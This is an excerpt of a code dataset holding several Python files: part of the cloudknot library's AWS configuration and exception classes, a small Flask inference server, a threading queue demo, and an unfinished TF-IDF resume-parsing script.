= 's3-bucket-policy'\n if config.has_section('aws') and config.has_option('aws', option):\n # Get policy name from the config file\n policy = config.get('aws', option)\n else:\n # or set policy to None to create it in the call to\n # set_s3_params()\n policy = None\n\n option = 's3-bucket'\n if config.has_section('aws') and config.has_option('aws', option):\n bucket = config.get('aws', option)\n else:\n try:\n # Get the bucket name from an environment variable\n bucket = os.environ['CLOUDKNOT_S3_BUCKET']\n except KeyError:\n # Use the fallback bucket b/c the cloudknot\n # bucket environment variable is not set\n bucket = ('cloudknot-' + get_user().lower()\n + '-' + str(uuid.uuid4()))\n\n if policy is not None:\n # In this case, the bucket name is new, but the policy is not.\n # Update the policy to reflect the new bucket name.\n update_s3_policy(policy=policy, bucket=bucket)\n\n option = 's3-sse'\n if config.has_section('aws') and config.has_option('aws', option):\n sse = config.get('aws', option)\n if sse not in ['AES256', 'aws:kms', 'None']:\n raise CloudknotInputError(\n 'The server-side encryption option \"sse\" must must be '\n 'one of [\"AES256\", \"aws:kms\", \"None\"]'\n )\n else:\n sse = None\n\n if sse == 'None':\n sse = None\n\n # Use set_s3_params to check for name availability\n # and write to config file\n set_s3_params(bucket=bucket, policy=policy, sse=sse)\n\n if policy is None:\n config.read(config_file)\n policy = config.get('aws', 's3-bucket-policy')\n\n response = clients['iam'].list_policies(Scope='Local',\n PathPrefix='/cloudknot/')\n policy_arn = list(filter(\n lambda d: d['PolicyName'] == policy,\n response.get('Policies')\n ))[0]['Arn']\n\n return BucketInfo(bucket=bucket, policy=policy,\n policy_arn=policy_arn, sse=sse)\n\n\n@registered\ndef set_s3_params(bucket, policy=None, sse=None):\n \"\"\"Set the cloudknot S3 bucket\n\n Set bucket by modifying the cloudknot config file\n\n Parameters\n ----------\n bucket : string\n Cloudknot S3 bucket name\n policy : string\n Cloudknot S3 bucket access policy name\n Default: None means that cloudknot will create a new policy\n sse : string\n S3 server side encryption method. If provided, must be one of\n ['AES256', 'aws:kms'].\n Default: None\n \"\"\"\n if sse is not None and sse not in ['AES256', 'aws:kms']:\n raise CloudknotInputError('The server-side encryption option \"sse\" '\n 'must be one of [\"AES256\", \"aws:kms\"]')\n\n # Update the config file\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n def test_bucket_put_get(bucket_, sse_):\n key = 'cloudnot-test-permissions-key'\n try:\n if sse_:\n clients['s3'].put_object(Bucket=bucket_, Body=b'test',\n Key=key, ServerSideEncryption=sse_)\n else:\n clients['s3'].put_object(Bucket=bucket_, Body=b'test', Key=key)\n\n clients['s3'].get_object(Bucket=bucket_, Key=key)\n except clients['s3'].exceptions.ClientError:\n raise CloudknotInputError('The requested bucket name already '\n 'exists and you do not have permission '\n 'to put or get objects in it.')\n\n try:\n clients['s3'].delete_object(Bucket=bucket_, Key=key)\n except Exception:\n pass\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 's3-bucket', bucket)\n\n # Create the bucket\n try:\n if get_region() == 'us-east-1':\n clients['s3'].create_bucket(\n Bucket=bucket\n )\n else:\n clients['s3'].create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n 'LocationConstraint': get_region()\n }\n )\n except clients['s3'].exceptions.BucketAlreadyOwnedByYou:\n pass\n except clients['s3'].exceptions.BucketAlreadyExists:\n test_bucket_put_get(bucket, sse)\n except clients['s3'].exceptions.ClientError as e:\n # Check for Illegal Location Constraint\n error_code = e.response['Error']['Code']\n if error_code in ['IllegalLocationConstraintException',\n 'InvalidLocationConstraint']:\n response = clients['s3'].get_bucket_location(Bucket=bucket)\n location = response.get('LocationConstraint')\n try:\n if location == 'us-east-1' or location is None:\n clients['s3'].create_bucket(Bucket=bucket)\n else:\n clients['s3'].create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n 'LocationConstraint': location\n }\n )\n except clients['s3'].exceptions.BucketAlreadyOwnedByYou:\n pass\n except clients['s3'].exceptions.BucketAlreadyExists:\n test_bucket_put_get(bucket, sse)\n else:\n # Pass exception to user\n raise e\n\n if policy is None:\n policy = 'cloudknot-bucket-access-' + str(uuid.uuid4())\n\n try:\n # Create the policy\n s3_policy_doc = bucket_policy_document(bucket)\n\n clients['iam'].create_policy(\n PolicyName=policy,\n Path='/cloudknot/',\n PolicyDocument=json.dumps(s3_policy_doc),\n Description='Grants access to S3 bucket {0:s}'\n ''.format(bucket)\n )\n except clients['iam'].exceptions.EntityAlreadyExistsException:\n # Policy already exists, do nothing\n pass\n\n config.set('aws', 's3-bucket-policy', policy)\n config.set('aws', 's3-sse', str(sse))\n with open(config_file, 'w') as f:\n config.write(f)\n\n\ndef bucket_policy_document(bucket):\n \"\"\"Return the policy document to access an S3 bucket\n\n Parameters\n ----------\n bucket: string\n An Amazon S3 bucket name\n\n Returns\n -------\n s3_policy_doc: dict\n A dictionary containing the AWS policy document\n \"\"\"\n # Add policy statements to access to cloudknot S3 bucket\n s3_policy_doc = {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"s3:ListBucket\"],\n \"Resource\": [\"arn:aws:s3:::{0:s}\".format(bucket)]\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"s3:PutObject\", \"s3:GetObject\"],\n \"Resource\": [\"arn:aws:s3:::{0:s}/*\".format(bucket)]\n },\n ]\n }\n\n return s3_policy_doc\n\n\ndef update_s3_policy(policy, bucket):\n \"\"\"Update the cloudknot S3 access policy with new bucket name\n\n Parameters\n ----------\n policy: string\n Amazon S3 bucket access policy name\n\n bucket: string\n Amazon S3 bucket name\n \"\"\"\n s3_policy_doc = bucket_policy_document(bucket)\n\n # Get the ARN of the policy\n response = clients['iam'].list_policies(\n Scope='Local',\n PathPrefix='/cloudknot/'\n )\n\n policy_dict = [p for p in response.get('Policies')\n if p['PolicyName'] == policy][0]\n\n arn = policy_dict['Arn']\n\n with rlock:\n try:\n # Update the policy\n clients['iam'].create_policy_version(\n PolicyArn=arn,\n PolicyDocument=json.dumps(s3_policy_doc),\n SetAsDefault=True\n )\n except clients['iam'].exceptions.LimitExceededException:\n # Too many policy versions. List policy versions and delete oldest\n response = clients['iam'].list_policy_versions(\n PolicyArn=arn\n )\n\n # Get non-default versions\n versions = [v for v in response.get('Versions')\n if not v['IsDefaultVersion']]\n\n # Get the oldest version and delete it\n oldest = sorted(versions, key=lambda ver: ver['CreateDate'])[0]\n clients['iam'].delete_policy_version(\n PolicyArn=arn,\n VersionId=oldest['VersionId']\n )\n\n # Update the policy not that there's room for another version\n clients['iam'].create_policy_version(\n PolicyArn=arn,\n PolicyDocument=json.dumps(s3_policy_doc),\n SetAsDefault=True\n )\n\n\n@registered\ndef get_region():\n \"\"\"Get the default AWS region\n\n First, check the cloudknot config file for the region option.\n If that fails, check for the AWS_DEFAULT_REGION environment variable.\n If that fails, use the region in the AWS (not cloudknot) config file.\n If that fails, use us-east-1.\n\n Returns\n -------\n region : string\n default AWS region\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if config.has_section('aws') and config.has_option('aws', 'region'):\n return config.get('aws', 'region')\n else:\n # Set `region`, the fallback region in case the cloudknot\n # config file has no region set\n try:\n # Get the region from an environment variable\n region = os.environ['AWS_DEFAULT_REGION']\n except KeyError:\n # Get the default region from the AWS config file\n home = os.path.expanduser('~')\n aws_config_file = os.path.join(home, '.aws', 'config')\n\n fallback_region = 'us-east-1'\n if os.path.isfile(aws_config_file):\n aws_config = configparser.ConfigParser()\n aws_config.read(aws_config_file)\n try:\n region = aws_config.get(\n 'default', 'region', fallback=fallback_region\n )\n except TypeError: # pragma: nocover\n # python 2.7 compatibility\n region = aws_config.get('default', 'region')\n region = region if region else fallback_region\n else:\n region = fallback_region\n\n if not config.has_section('aws'):\n config.add_section('aws')\n\n config.set('aws', 'region', region)\n with open(config_file, 'w') as f:\n config.write(f)\n\n return region\n\n\n@registered\ndef set_region(region='us-east-1'):\n \"\"\"Set the AWS region that cloudknot will use\n\n Set region by modifying the cloudknot config file and clients\n\n Parameters\n ----------\n region : string\n An AWS region.\n Default: 'us-east-1'\n \"\"\"\n response = clients['ec2'].describe_regions()\n region_names = [d['RegionName'] for d in response.get('Regions')]\n\n if region not in region_names:\n raise CloudknotInputError('`region` must be in {regions!s}'.format(\n regions=region_names\n ))\n\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 'region', region)\n with open(config_file, 'w') as f:\n config.write(f)\n\n # Update the boto3 clients so that the region change is reflected\n # throughout the package\n max_pool = clients['iam'].meta.config.max_pool_connections\n boto_config = botocore.config.Config(max_pool_connections=max_pool)\n session = boto3.Session(profile_name=get_profile(fallback=None))\n clients['batch'] = session.client('batch', region_name=region,\n config=boto_config)\n clients['cloudformation'] = session.client('cloudformation',\n region_name=region,\n config=boto_config)\n clients['ecr'] = session.client('ecr', region_name=region,\n config=boto_config)\n clients['ecs'] = session.client('ecs', region_name=region,\n config=boto_config)\n clients['ec2'] = session.client('ec2', region_name=region,\n config=boto_config)\n clients['iam'] = session.client('iam', region_name=region,\n config=boto_config)\n clients['sts'] = session.client('sts', region_name=region,\n config=boto_config)\n clients['s3'] = session.client('s3', region_name=region,\n config=boto_config)\n\n\n@registered\ndef list_profiles():\n \"\"\"Return a list of available AWS profile names\n\n Search the aws credentials file and the aws config file for profile names\n\n Returns\n -------\n profile_names : namedtuple\n A named tuple with fields: `profile_names`, a list of AWS profiles in\n the aws config file and the aws shared credentials file;\n `credentials_file`, a path to the aws shared credentials file;\n and `aws_config_file`, a path to the aws config file\n \"\"\"\n aws = os.path.join(os.path.expanduser('~'), '.aws')\n\n try:\n # Get aws credentials file from environment variable\n env_file = os.environ['AWS_SHARED_CREDENTIALS_FILE']\n credentials_file = os.path.abspath(env_file)\n except KeyError:\n # Fallback on default credentials file path\n credentials_file = os.path.join(aws, 'credentials')\n\n try:\n # Get aws config file from environment variable\n env_file = os.environ['AWS_CONFIG_FILE']\n aws_config_file = os.path.abspath(env_file)\n except KeyError:\n # Fallback on default aws config file path\n aws_config_file = os.path.join(aws, 'config')\n\n credentials = configparser.ConfigParser()\n credentials.read(credentials_file)\n\n aws_config = configparser.ConfigParser()\n aws_config.read(aws_config_file)\n\n profile_names = [s.split()[1] for s in aws_config.sections()\n if s.split()[0] == 'profile' and len(s.split()) == 2]\n\n profile_names += credentials.sections()\n\n # define a namedtuple for return value type\n ProfileInfo = namedtuple(\n 'ProfileInfo',\n ['profile_names', 'credentials_file', 'aws_config_file']\n )\n\n return ProfileInfo(\n profile_names=profile_names,\n credentials_file=credentials_file,\n aws_config_file=aws_config_file\n )\n\n\n@registered\ndef get_user():\n return clients['sts'].get_caller_identity().get('Arn').split('/')[-1]\n\n\n@registered\ndef get_profile(fallback='from-env'):\n \"\"\"Get the AWS profile to use\n\n First, check the cloudknot config file for the profile option.\n If that fails, check for the AWS_PROFILE environment variable.\n If that fails, return 'default' if there is a default profile in AWS config\n or credentials files. If that fails, return the fallback value.\n\n Parameters\n ----------\n fallback :\n The fallback value if get_profile cannot find an AWS profile.\n Default: 'from-env'\n\n Returns\n -------\n profile_name : string\n An AWS profile listed in the aws config file or aws shared\n credentials file\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if config.has_section('aws') and config.has_option('aws', 'profile'):\n return config.get('aws', 'profile')\n else:\n # Set profile from environment variable\n try:\n profile = os.environ['AWS_PROFILE']\n except KeyError:\n if 'default' in list_profiles().profile_names:\n # Set profile in cloudknot config to 'default'\n profile = 'default'\n else:\n return fallback\n\n if not config.has_section('aws'):\n config.add_section('aws')\n\n config.set('aws', 'profile', profile)\n with open(config_file, 'w') as f:\n config.write(f)\n\n return profile\n\n\n@registered\ndef set_profile(profile_name):\n \"\"\"Set the AWS profile that cloudknot will use\n\n Set profile by modifying the cloudknot config file and clients\n\n Parameters\n ----------\n profile_name : string\n An AWS profile listed in the aws config file or aws shared\n credentials file\n \"\"\"\n profile_info = list_profiles()\n\n if profile_name not in profile_info.profile_names:\n raise CloudknotInputError(\n 'The profile you specified does not exist in either the AWS '\n 'config file at {conf:s} or the AWS shared credentials file at '\n '{cred:s}.'.format(\n conf=profile_info.aws_config_file,\n cred=profile_info.credentials_file\n )\n )\n\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 'profile', profile_name)\n with open(config_file, 'w') as f:\n config.write(f)\n\n # Update the boto3 clients so that the profile change is reflected\n # throughout the package\n max_pool = clients['iam'].meta.config.max_pool_connections\n boto_config = botocore.config.Config(max_pool_connections=max_pool)\n session = boto3.Session(profile_name=profile_name)\n clients['batch'] = session.client('batch', region_name=get_region(),\n config=boto_config)\n clients['cloudformation'] = session.client('cloudformation',\n region_name=get_region(),\n config=boto_config)\n clients['ecr'] = session.client('ecr', region_name=get_region(),\n config=boto_config)\n clients['ecs'] = session.client('ecs', region_name=get_region(),\n config=boto_config)\n clients['ec2'] = session.client('ec2', region_name=get_region(),\n config=boto_config)\n clients['iam'] = session.client('iam', region_name=get_region(),\n config=boto_config)\n clients['sts'] = session.client('sts', region_name=get_region(),\n config=boto_config)\n clients['s3'] = session.client('s3', region_name=get_region(),\n config=boto_config)\n\n\n#: module-level dictionary of boto3 clients for IAM, EC2, Batch, ECR, ECS, S3.\nclients = {\n 'batch': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'batch', region_name=get_region()\n ),\n 'cloudformation': boto3.Session(\n profile_name=get_profile(fallback=None)\n ).client('cloudformation', region_name=get_region()),\n 'ecr': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'ecr', region_name=get_region()\n ),\n 'ecs': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'ecs', region_name=get_region()\n ),\n 'ec2': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'ec2', region_name=get_region()\n ),\n 'iam': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'iam', region_name=get_region()\n ),\n 'sts': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'sts', region_name=get_region()\n ),\n 's3': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 's3', region_name=get_region()\n ),\n}\n\"\"\"module-level dictionary of boto3 clients.\n\nStoring the boto3 clients in a module-level dictionary allows us to change\nthe region and profile and have those changes reflected globally.\n\nAdvanced users: if you want to use cloudknot and boto3 at the same time,\nyou should use these clients to ensure that you have the right profile\nand region.\n\"\"\"\n\n\n@registered\ndef refresh_clients(max_pool=10):\n \"\"\"Refresh the boto3 clients dictionary\"\"\"\n with rlock:\n config = botocore.config.Config(max_pool_connections=max_pool)\n session = boto3.Session(profile_name=get_profile(fallback=None))\n clients['iam'] = session.client('iam', region_name=get_region(),\n config=config)\n clients['ec2'] = session.client('ec2', region_name=get_region(),\n config=config)\n clients['batch'] = session.client('batch', region_name=get_region(),\n config=config)\n clients['ecr'] = session.client('ecr', region_name=get_region(),\n config=config)\n clients['ecs'] = session.client('ecs', region_name=get_region(),\n config=config)\n clients['s3'] = session.client('s3', region_name=get_region(),\n config=config)\n clients['cloudformation'] = session.client('cloudformation',\n region_name=get_region(),\n config=config)\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ResourceExistsException(Exception):\n \"\"\"Exception indicating that the requested AWS resource already exists\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the requested resource\n \"\"\"\n super(ResourceExistsException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ResourceDoesNotExistException(Exception):\n \"\"\"Exception indicating that the requested AWS resource does not exists\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the requested resource\n \"\"\"\n super(ResourceDoesNotExistException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ResourceClobberedException(Exception):\n \"\"\"Exception indicating that this AWS resource has been clobbered\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the requested resource\n \"\"\"\n super(ResourceClobberedException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CannotDeleteResourceException(Exception):\n \"\"\"Exception indicating that an AWS resource cannot be deleted\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the dependent resources\n \"\"\"\n super(CannotDeleteResourceException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CannotCreateResourceException(Exception):\n \"\"\"Exception indicating that an AWS resource cannot be created\"\"\"\n def __init__(self, message):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n \"\"\"\n super(CannotCreateResourceException, self).__init__(message)\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass RegionException(Exception):\n \"\"\"Exception indicating the current region is not this resource's region\"\"\"\n def __init__(self, resource_region):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n resource_region : string\n The resource region\n \"\"\"\n super(RegionException, self).__init__(\n \"This resource's region ({resource:s}) does not match the \"\n \"current region ({current:s})\".format(\n resource=resource_region, current=get_region()\n )\n )\n self.current_region = get_region()\n self.resource_region = resource_region\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ProfileException(Exception):\n \"\"\"Exception indicating the current profile isn't the resource's profile\"\"\"\n def __init__(self, resource_profile):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n resource_profile : string\n The resource profile\n \"\"\"\n super(ProfileException, self).__init__(\n \"This resource's profile ({resource:s}) does not match the \"\n \"current profile ({current:s})\".format(\n resource=resource_profile, current=get_profile()\n )\n )\n self.current_profile = get_profile()\n self.resource_profile = resource_profile\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CKTimeoutError(Exception):\n \"\"\"Cloudknot timeout error for AWS Batch job results\n\n Error indicating an AWS Batch job failed to return results within\n the requested time period\n \"\"\"\n def __init__(self, job_id):\n \"\"\"Initialize the Exception\"\"\"\n super(CKTimeoutError, self).__init__(\n 'The job with job-id {jid:s} did not finish within the '\n 'requested timeout period'.format(jid=job_id)\n )\n self.job_id = job_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass BatchJobFailedError(Exception):\n \"\"\"Error indicating an AWS Batch job failed\"\"\"\n def __init__(self, job_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n job_id : string\n The AWS jobId of the failed job\n \"\"\"\n super(BatchJobFailedError, self).__init__(\n \"AWS Batch job {job_id:s} has failed.\".format(job_id=job_id)\n )\n self.job_id = job_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CloudknotConfigurationError(Exception):\n \"\"\"Error indicating an cloudknot has not been properly configured\"\"\"\n def __init__(self, config_file):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n config_file : string\n The path to the cloudknot config file\n \"\"\"\n super(CloudknotConfigurationError, self).__init__(\n \"It looks like you haven't run `cloudknot configure` to set up \"\n \"your cloudknot environment. Or perhaps you did that but you have \"\n \"since deleted your cloudknot configuration file. Please run \"\n \"`cloudknot configure` before using cloudknot. \"\n )\n self.config_file = config_file\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass CloudknotInputError(Exception):\n \"\"\"Error indicating an input argument has an invalid value\"\"\"\n def __init__(self, msg):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n msg : string\n The error message\n \"\"\"\n super(CloudknotInputError, self).__init__(msg)\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass NamedObject(object):\n \"\"\"Base class for building objects with name property\"\"\"\n def __init__(self, name):\n \"\"\"Initialize a base class with a name\n\n Parameters\n ----------\n name : string\n Name of the object. Must satisfy regular expression\n pattern: [a-zA-Z][-a-zA-Z0-9]*\n \"\"\"\n config_file = get_config_file()\n conf = configparser.ConfigParser()\n with rlock:\n conf.read(config_file)\n\n if not (conf.has_section('aws')\n and conf.has_option('aws', 'configured')\n and conf.get('aws', 'configured') == 'True'):\n raise CloudknotConfigurationError(config_file)\n\n name = str(name).replace('_', '-')\n pattern = re.compile('[a-zA-Z][-a-zA-Z0-9]*')\n if not pattern.match(name):\n raise CloudknotInputError('name must satisfy regular expression '\n 'pattern: [a-zA-Z][-a-zA-Z0-9]*')\n\n self._name = name\n self._clobbered = False\n self._region = get_region()\n self._profile = get_profile()\n\n @property\n def name(self):\n \"\"\"The name of this AWS resource\"\"\"\n return self._name\n\n @property\n def clobbered(self):\n \"\"\"Has this instance been previously clobbered\"\"\"\n return self._clobbered\n\n @property\n def region(self):\n \"\"\"The AWS region in which this resource was created\"\"\"\n return self._region\n\n @property\n def profile(self):\n \"\"\"The AWS profile in which this resource was created\"\"\"\n return self._profile\n\n def _get_section_name(self, resource_type):\n \"\"\"Return the config section name\n\n Append profile and region to the resource type name\n \"\"\"\n return ' '.join([resource_type, self.profile, self.region])\n\n def check_profile(self):\n \"\"\"Check for profile exception\"\"\"\n if self.profile != get_profile():\n raise ProfileException(resource_profile=self.profile)\n\n def check_profile_and_region(self):\n \"\"\"Check for region and profile exceptions\"\"\"\n if self.region != get_region():\n raise RegionException(resource_region=self.region)\n\n self.check_profile()\n","repo_name":"RonCard/cloudknot","sub_path":"cloudknot/aws/base_classes.py","file_name":"base_classes.py","file_ext":"py","file_size_in_byte":34830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"29098553831","text":"from flask import Flask\nfrom ml_service import infer\napp = Flask(__name__)\n\n@app.route('/')\ndef hello():\n\treturn \"This is a test message\"\n\n@app.route('/inference/')\ndef run_inference(image):\n\ttry:\n\t\tprint(\"image to be inferred is:\",image)\n\t\tprediction = infer(image)\n\t\treturn prediction\n\texcept OSError as ose:\n\t\treturn \"File Not Found: Please load image, \" + image + \", in images/ directory\"\n\texcept:\n\t\treturn \"Internal Server Error: Please contact ml-inference team 16\"\n\nif __name__ == \"__main__\":\n\tapp.run(host ='0.0.0.0', port = 5000, debug = True) ","repo_name":"parin1995/ML_Inference_Docker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30341584090","text":"import threading\nimport queue\nimport time\n\nclass WriterThread(threading.Thread):\n ''' writer thread writes out the commands in an infinite loop '''\n\n def __init__(self, exitcmd):\n threading.Thread.__init__(self)\n self._cmd_queue = queue.Queue()\n self._kill_received = False\n self.timeout = 0.1\n self.exitcmd = exitcmd\n\n def add_command(self, cmd):\n self._cmd_queue.put(cmd, False)\n\n def run(self):\n ''' just loop and write responses '''\n try:\n while True:\n try:\n try:\n cmd = self._cmd_queue.get(True, 0.1)\n except queue.Empty:\n if self._kill_received:\n return # break if queue is empty and _kill_received\n else:\n continue\n except Exception as e:\n # pydev_log.info('Finishing debug communication...(1)')\n # when liberating the thread here, we could have errors because we were shutting down\n # but the thread was still not liberated\n print(f\"Exception getting commands in writer queue: {e}\")\n return\n\n\n print(f\"Sending cmd {cmd}\")\n\n if cmd == self.exitcmd:\n print('WriterThread: CMD_EXIT received')\n break\n if time is None:\n break # interpreter shutdown\n time.sleep(self.timeout)\n finally:\n print('WriterThread: exit')\n\n def empty(self):\n return self._cmd_queue.empty()\n\n\nclass ReaderThread(threading.Thread):\n ''' reader thread reads and dispatches commands in an infinite loop '''\n\n def __init__(self, writer: WriterThread, rangeLimit: int):\n threading.Thread.__init__(self)\n self._buffer = b''\n self._writer = writer\n self.rangelimit = rangeLimit\n\n def run(self):\n for i in range(self.rangelimit):\n time.sleep(0.1)\n print(f\"Read command {i}\")\n self._writer.add_command(i)\n\n\n\n\n# Block until all tasks are done.\nw = WriterThread(99)\nr = ReaderThread(w, 100)\nw.start()\nr.start()\nw.join()\nr.join()\nprint('All work completed')","repo_name":"rchiodo/wasm_node_test","sub_path":"queue_example/queue_example.py","file_name":"queue_example.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34955845993","text":"import numpy as np\nimport math\nimport time\nimport sys\nimport pymysql as py\n\ndef Distance(a, b, xSize, ySize, Dfunc):\n output = np.zeros(xSize)\n for i in range(xSize):\n output[i]=Dfunc(a[i],b,ySize)\n return np.round(output,3)\n\n\ndef Euclidean(a, b, ySize):\n output=0\n for j in range(ySize):\n output+=(a[j]-b[j])**2\n return math.sqrt(output)\n\n\ndef Cosine(a,b,ySize):\n if np.linalg.norm(a) == 0 or np.linalg.norm(b) == 0:\n return 1\n return 1-np.dot(a,b)/np.linalg.norm(a)/np.linalg.norm(b)\n\n\ndef solve(tf_idf, tf_idf_this, totalNumofDoc, totalNumofWord, num):\n DE = Distance(tf_idf, tf_idf_this, totalNumofDoc, totalNumofWord, Euclidean)\n DC = Distance(tf_idf, tf_idf_this, totalNumofDoc, totalNumofWord, Cosine)\n\n out_DE = DE.argsort(kind='mergesort')[:num]\n out_DC = DC.argsort(kind='mergesort')[:num]\n\n #print(\"Euclidean: {} {} {}\".format(out_DE[0] + 1, out_DE[1] + 1, out_DE[2] + 1))\n #print(\"Cosine: {} {} {}\".format(out_DC[0] + 1, out_DC[1] + 1, out_DC[2] + 1))\n return [out_DE[:num], out_DC[:num],[DE[out_DE[0]],DE[out_DE[1]],DE[out_DE[2]]], [DC[[out_DC[0]]], DC[out_DC[1]], DC[out_DC[2]]]]\n\n\ndef findClosest(totalNumofNewDoc, file, num):\n tf_idf = np.load(\"../python/Parser/tf_idf.npy\")\n idf = np.load(\"../python/Parser/idf.npy\")\n dict = np.load(\"../python/Parser/dict.npy\").item()\n temp = np.load(\"../python/Parser/totalNum.npy\")\n linesData = []\n totalNumofDoc, totalNumofWord = temp[0], temp[1]\n w, h = totalNumofWord, totalNumofNewDoc\n output1 = [[0 for y in range(2)] for z in range(h)]\n output2 = [[0 for y in range(2)] for z in range(h)]\n\n tf = np.zeros((totalNumofNewDoc, totalNumofWord))\n index = 0\n\n for line in targetFile:\n numOfEmpty = 0\n emptyLine = 0\n\n while numOfEmpty < len(line):\n\n if line[numOfEmpty] == '\\n' or line[numOfEmpty] == '\\r':\n emptyLine = 1\n break\n\n elif line[numOfEmpty] == ' ':\n numOfEmpty += 1\n\n else:\n break\n\n if emptyLine == 1:\n continue\n\n line = line[numOfEmpty:]\n linesData += [line]\n translation_table = dict.fromkeys(map(ord, \",.:!?'\\\"\\n\"), None)\n line = line.translate(translation_table)\n line = line.lower()\n fields = line.split(' ')\n for words in fields:\n if words not in dict:\n continue\n tf[index][dict[words]] += 1\n tf[index] /= len(fields)\n index += 1\n\n for j in range(totalNumofNewDoc):\n for i in range(totalNumofWord):\n tf[j][i] *= idf[i]\n temp = solve(tf_idf, tf[j], totalNumofDoc, totalNumofWord, num)\n output1[j][0] = temp[0]\n output1[j][1] = temp[1]\n output2[j][0] = temp[2]\n output2[j][1] = temp[3]\n return output1, output2, linesData\n\n\ndef determineLabel(NumofSamples, file, num, minSupp):\n label = np.load(\"../python/parser/label.npy\")\n temp, dist, lines = findClosest(NumofSamples, file, num)\n returnLabels = [0 for i in range(NumofSamples)]\n confidence = [0 for i in range(NumofSamples)]\n\n for i in range(NumofSamples):\n count = dict()\n for j in range(num):\n label0 = label[temp[i][0][j]]\n label1 = label[temp[i][1][j]]\n if (dist[i][0][j] <= 1):\n if label0 not in count:\n count[label0] = 1*(1-dist[i][0][j])\n else:\n count[label0] += 1*(1-dist[i][0][j])\n\n if (dist[i][1][j] <= 1):\n if label1 not in count:\n count[label1] = 1*(1-dist[i][1][j])\n else:\n count[label1] += 1*(1-dist[i][1][j])\n result = sorted(count, key=count.get, reverse=True)\n if float(count[result[0]]) >= minSupp:\n returnLabels[i] = [lines[i], result[0]]\n confidence[i] = float(count[result[0]])\n return returnLabels, confidence\n\n\ndef assignRightThings(labels):\n result = dict()\n index = -1\n\n for i in labels:\n if i == 0:\n continue\n if i[1] == 'University':\n if 'University' not in result:\n result['University'] = i[0]\n\n if i[1] == 'Degree Type':\n if 'Major' not in result:\n result['Major'] = i[0]\n\n if i[1] == 'Minor':\n if 'Minor' not in result:\n result['Minor'] = i[0]\n\n if i[1] == 'Skill':\n if 'Skill' not in result:\n result['Skill'] = set()\n result['Skill'].add(i[0])\n\n if i[1] == 'Title':\n index += 1\n if 'Experience' not in result:\n result['Experience'] = []\n result['Experience'] += [dict()]\n\n result['Experience'][index]['Title'] = i[0]\n\n if i[1] == 'Date':\n if index< 0:\n continue\n else:\n if 'Date' not in result['Experience'][index]:\n result['Experience'][index]['Date'] = i[0]\n\n if i[1] == 'Location':\n if index< 0:\n continue\n else:\n if 'Location' not in result['Experience'][index]:\n result['Experience'][index]['Location'] = i[0]\n\n if 